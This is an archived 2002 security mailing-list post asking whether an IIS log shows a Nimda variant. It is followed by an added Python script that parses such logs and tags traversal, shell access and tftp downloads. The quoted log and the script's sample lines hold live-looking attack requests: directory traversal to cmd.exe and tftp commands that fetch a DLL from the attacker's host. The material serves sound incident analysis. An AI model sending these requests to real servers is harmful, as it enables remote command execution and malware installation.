Another Nimda attack??

From: Eugene Chua Yew Gin (chuayg@1-net.com.sg)
Date: Tue Sep 17 2002 - 02:42:37 PDT

    Hi, I need some advice on the log below. Can anyone advise whether it is a pattern
    of Nimda? I find it rather strange because it downloads cool.dll and
    httpodbc.dll instead of Admin.dll.  Norton Antivirus reported a W32.Nimda.E@MM
    (dr) virus; is it a new variant?
    
    Thanks and regards.
    
    2002-09-16 07:53:21 202.100.249.231 - xxxx 80 GET /scripts/root.exe /c+dir 404 -
    2002-09-16 07:53:21 202.100.249.231 - xxxx 80 GET /MSADC/root.exe /c+dir 403 -
    2002-09-16 07:53:23 202.100.249.231 - xxxx 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
    2002-09-16 07:53:23 202.100.249.231 - xxxx 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
    2002-09-16 07:53:25 202.100.249.231 - xxxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
    2002-09-16 07:53:56 202.100.249.231 - xxxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20c:\httpodbc.dll 502 -
    2002-09-16 07:54:24 202.100.249.231 - 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20d:\httpodbc.dll 502 -
    2002-09-16 07:54:51 202.100.249.231 - 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20e:\httpodbc.dll 502 -
    2002-09-16 07:54:53 202.100.249.231 - 80 GET /scripts/..%5c../httpodbc.dll - 500 -
    2002-09-16 07:54:53 202.100.249.231 - 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
    2002-09-16 07:54:54 202.100.249.231 - 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20c:\httpodbc.dll 502 -
    2002-09-16 07:54:54 202.100.249.231 - 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20d:\httpodbc.dll 502 -
    2002-09-16 07:54:55 202.100.249.231 - 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20e:\httpodbc.dll 502 -
    2002-09-16 07:54:55 202.100.249.231 - 80 GET /_vti_bin/..%5c../..%5c../..%5c../httpodbc.dll - 500 -
    2002-09-16 07:54:55 202.100.249.231 - 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
    2002-09-16 07:54:57 202.100.249.231 - 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
    2002-09-16 07:54:57 202.100.249.231 - 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
    2002-09-16 07:54:58 202.100.249.231 - 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
    2002-09-16 07:54:58 202.100.249.231 - 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
    
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
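A small triage script for IIS W3C log lines like the ones in the post above, added here as an example (not part of the original message or of any SecurityFocus tool). It decodes the request path, tags traversal attempts that reach cmd.exe or root.exe, records which file each tftp command fetched and where it was saved, and then flags later requests for that dropped file; the sample lines are constructed from the post, and the tag names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample lines modelled on the log quoted in the post (host field 'xxxx').
SAMPLE_LOG = [
    "2002-09-16 07:53:21 202.100.249.231 - xxxx 80 GET /scripts/root.exe /c+dir 404 -",
    "2002-09-16 07:53:25 202.100.249.231 - xxxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -",
    "2002-09-16 07:53:56 202.100.249.231 - xxxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe "
    "/c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20c:\\httpodbc.dll 502 -",
    "2002-09-16 07:54:53 202.100.249.231 - 80 GET /scripts/..%5c../httpodbc.dll - 500 -",
    "2002-09-16 07:55:00 10.0.0.5 - xxxx 80 GET /index.htm - 200 -",
]

TFTP_RE = re.compile(r"tftp\s+-i\s+(\S+)\s+get\s+(\S+)\s+(\S+)", re.IGNORECASE)

def parse(line):
    """Split an IIS W3C line; the post's lines carry 4 or 5 fields before the method."""
    t = line.split()
    i = t.index("GET")
    return {"ip": t[2], "stem": t[i + 1], "query": t[i + 2], "status": int(t[i + 3])}

def classify(entry, dropped):
    """Tag one request. 'dropped' accumulates files written by earlier tftp fetches."""
    tags = set()
    # decode twice: IIS keeps one layer (%255c -> %5c); decode again to see the real path
    stem = unquote(unquote(entry["stem"])).replace("\\", "/").lower()
    base = stem.rsplit("/", 1)[-1]
    if ".." in stem:
        tags.add("traversal")
    if base in ("cmd.exe", "root.exe"):
        tags.add("shell-request")
        if entry["status"] == 200:
            tags.add("shell-reached")          # the server ran the command (e.g. dir)
    m = TFTP_RE.search(unquote(entry["query"]))
    if m:
        tags.add("tftp-fetch:" + m.group(2))   # remote file name, e.g. cool.dll
        dropped.add(re.split(r"[\\/]", m.group(3))[-1].lower())  # c:\httpodbc.dll
    if base in dropped:
        tags.add("dropped-file-requested")     # client now asks IIS to load what it fetched
    return tags

def scan(lines):
    """Return (client-ip, sorted tags) per line, carrying tftp state across the session."""
    dropped = set()
    return [(e["ip"], sorted(classify(e, dropped))) for e in map(parse, lines)]

if __name__ == "__main__":
    for ip, tags in scan(SAMPLE_LOG):
        print(ip, tags)
```

The "tftp-fetch:" tag names the file actually pulled, so an analyst can compare it with the Admin.dll that the classic Nimda sequence fetches, and a "shell-reached" tag on a traversal line is the clearest sign the server itself was exposed.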
    



    This archive was generated by hypermail 2b30 : Tue Sep 17 2002 - 17:38:52 PDT